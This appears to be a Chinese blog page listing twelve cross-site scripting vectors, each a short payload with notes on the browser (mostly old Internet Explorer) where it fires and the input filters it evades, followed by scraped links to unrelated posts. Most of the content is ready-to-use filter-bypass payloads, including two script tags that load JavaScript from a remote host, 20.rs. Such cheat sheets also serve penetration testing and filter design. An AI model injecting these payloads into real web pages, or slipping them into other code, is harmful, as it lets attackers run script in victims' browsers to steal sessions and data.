XSS Vector #1

<script src=/〱20.rs></script>

URL中第二个斜杠在Internet Explorer下(测试于IE11)可被U+3031,U+3033,U+3035,U+309D,U+30FC,U+30FD,U+FF70代替。在特定环境下可以帮助测试者绕过一些正则。

XSS Vector #2

<script src=//20.rs async>

这个Vector可以在不闭合script标签的情况下,在IE下(测试于IE11)正常调用远程的JavaScript。不但可以有效地绕过一些无聊的正则,还可以帮助你缩短你的payload。btw,这和后面会不会出现其它的script标签进而导致当前payload被闭合的一类现象无关。

XSS Vector #3

<div style="x: /**/ression(alert(1))('\')exp\')">

IE的一个CSS Parse BUG。在特定情况下可能可以帮助绕过一些XSS的防御正则。by @gainover

XSS Vector #4

<script>/*@cc_on alert(1) @*/</script>

当输出点在多行注视符号之间,切无法结束script标签时,可以借助该Vector在IE下(需要IE版本在10或以前)成功的XSS。

XSS Vector #5

<base href="javascript:\"><a href="//%0aalert(1);//“>Click Me</a>

该Vector在不久前由@irsdl发布。测试在Chrome下有效。

XSS Vector #6

<title>&lt;img src= onerror=alert()&gt;</title> div.innerHTML = document.getElementsByTagName("title")[]; // IE8, already-known?

IE8下的又一枚mXSS,最近由@hasegawayosuke发布在了Twitter上。

XSS Vector #7

<picture><source srcset=><img onerror=alert()>

最近由.mario发布在Twitter上。测试在Chrome canary下有效。

XSS Vector #8

<script>''+{valueOf:location, toString:[].join,:'javascript:prompt%281%29’,length:1}</script>

这确实是炒冷饭。不过很少见人提到。该Vector同样只在IE下有效。优点就是不需要等号和圆括号。意味着在某些情况下可以帮你简单绕过一些不切实际的XSS Filter进而构造你有效的POC。

XSS Vector #9

<meta http-equiv="X-UA-Compatible" content="IE=9;"><% onclick=alert()>click me

该Vector仅在IE9有效。可以看到左尖括号后面紧跟着的并不是字母。但在IE9这依然会被认定为是一个有效的标签。就像我们对大部分的未知标签的理解,我们可以在那些莫名其妙的标签当中使用onclick和onmouse系列的event handler进行XSS跨站攻击。至于可以拿来干什么,仁者见仁吧。

XSS Vector #10

<script>alert``</script>

ES6新特性。可以使用backtick来代替圆括号。测试于Firefox Nightly.

XSS Vector #11

<input onresize=alert()>

这对于input标签来说应该是最短的Vector了。在IE10下有效。无需autofocus进行辅助和用户交互就可以自动触发。在autofocus被过滤,无法重写type的情况下算是个选项。除此之外对于使用autofocus的vector除了我们熟知的onblur,onfocus等还有几个event handler可以用来XSS。

<iframe src=被xss的页面.htm>

被xss的页面.htm

<input onActivate=alert() autofocus>
<input onBeforeActivate=alert() autofocus>

在IE10和IE11下有效。当然了,如果可以写入type=image 我们还可以使用onload,onerror这类的event handler。

XSS Vector #12

<iframe src=test.htm> <input type=hidden style=x:expression(alert())> 测试于IE6- by @Sogili
<form><input type=hidden onforminput=alert('what?')><input></form> 测试于Opera12
<svg><input type=hidden onload=alert()> //测试于safari7.0.6

有些是冷面,有些需要用户交互,有些你可能并不认为是bypass。仁者见仁吧。该Vector的重点在于type=hidden。

12个有趣的 XSS Vector的更多相关文章

  1. (转) exp1-1:// 一次有趣的XSS漏洞挖掘分析(1)

    from http://www.cnblogs.com/hookjoy/p/3503786.html 一次有趣的XSS漏洞挖掘分析(1)   最近认识了个新朋友,天天找我搞XSS.搞了三天,感觉这一套 ...

  2. 12个有趣的C语言问答(详解)

    本文参照博文<12个有趣的C语言问答>,在原文的基础上增加来对应的知识点的详细介绍. 1 gets()方法 Q:下面的代码有一个被隐藏的问题,你能找到它吗? #include <st ...

  3. 《12个有趣的C语言问答》(4)

    C语言面试问答——<12个有趣的C语言问答>评析(4) 前文链接:http://www.cnblogs.com/pmer/p/3324063.html 8,Making changes i ...

  4. 《12个有趣的C语言问答》评析2

    <12个有趣的C语言问答>评析(2) 前文链接:http://www.cnblogs.com/pmer/p/3313913.html (没存盘,遭遇过热保护.至少4个问答的评论白写了.默哀 ...

  5. 12个有趣的c语言面试题&nbsp;

    1.gets()函数 问:请找出下面代码里的问题: #include int main(void) { char buff[10]; memset(buff,0,sizeof(buff)); gets ...

  6. 一次有趣的XSS漏洞挖掘分析(1)

    最近认识了个新朋友,天天找我搞XSS.搞了三天,感觉这一套程序还是很有意思的.因为是过去式的文章,所以没有图.但是希望把经验分享出来,可以帮到和我一样爱好XSS的朋友.我个人偏爱富文本XSS,因为很有 ...

  7. 一次有趣的XSS漏洞挖掘分析(3)最终篇

    这真是最后一次了.真的再不逗这个程序员了.和预期一样,勤奋的程序员今天又更新程序了.因为前面写的payload都有一个致命的弱点,就是document.write()会完全破坏DOM结构.而且再“完事 ...

  8. 一次有趣的XSS漏洞挖掘分析(2)

    第一次和一套程序做了这么多次的斗争.今天基友又给我来信说,没得玩了.了解了下情况,是他拿着0day到处插,被人家发现了.还出了个公告,说所有***必须安装补丁.呵呵,性福总是走的这么突然.这乐子一下就 ...

  9. Java 集合深入理解(12):古老的 Vector

    点击查看 Java 集合框架深入理解 系列, - ( ゜- ゜)つロ 乾杯~ 今天刮台风,躲屋里看看 Vector ! 都说 Vector 是线程安全的 ArrayList,今天来根据源码看看是不是这 ...

随机推荐

  1. SPOJ - HIGH Highways(矩阵树定理)

    https://vjudge.net/problem/SPOJ-HIGH 题意: 给n个点m条边,求生成树个数. 思路: 矩阵树裸题. 具体的话可以看一下周冬的论文<生成树的计数及其应用> ...

  2. BZOJ 1005: [HNOI2008]明明的烦恼(prufer数列)

    http://www.lydsy.com/JudgeOnline/problem.php?id=1005 题意: Description 自从明明学了树的结构,就对奇怪的树产生了兴趣......给出标 ...

  3. UVa 242 邮票和信封(完全背包)

    https://vjudge.net/problem/UVA-242 题意: 输入s(每个信封能粘贴的最多邮票数量)和若干邮票组合,选出最大连续邮资最大的一个组合(最大连续邮资也就是用s张以内的邮票来 ...

  4. MYSQL语句:创建、授权、查询、修改、统计分析等 二 用户的创建、权限设置、删除

    接着上面一的内容 4.设置更改用户密码 命令格式:SET PASSWORD FOR 'username'@'host'=PASSWORD('newpassword'); 如果是当前登录用户用:SET ...

  5. 获取CheckBox的值

    前台获取 function chkCheckBox() { var code_arr = new Array(); //定义一数组 $('.C_B').each(function () { if ($ ...

  6. Intel微处理器学习笔记(一) 实模式内存结构

    图一 奔腾概念示意图 存储系统一般划分为三个主要部分:TPA(transient program area),System Area和XMS(extended memory system). 图二 内 ...

  7. PHP框架CI(codeigniter)的使用笔记

    流程图: 控制: 1.当想在控制类中直接跳转到其它控制类时,可以使用redirect()函数. 2.session的应用,在分页查询的时候可以用session(普通的get方式对CI来说太麻烦了):在 ...

  8. Springboot 学习笔记 之 Day 4 笔记部分

    spring-boot-starter 核心Spring Boot starter,包括自动配置支持,日志和YAMLspring-boot-starter-actuator 生产准备的特性,用于帮你监 ...

  9. Index.cshtml”处的视图必须派生自 WebViewPage 或 WebViewPage<TModel>。

    解决方案: 1,在每个视图上面添加 @inherits System.Web.Mvc.WebViewPage 2,将views中的web.config COPY到新的视图模版文件夹下,就可以了

  10. 从celery rabbitmq with docker-compose 引出对容器、依赖注入、TDD的感悟

    用docker配置项目管理系统taiga的时候,不是我一个人遇到这个问题.https://github.com/douglasmiranda/docker-taiga/issues/5 问题描述: 用 ...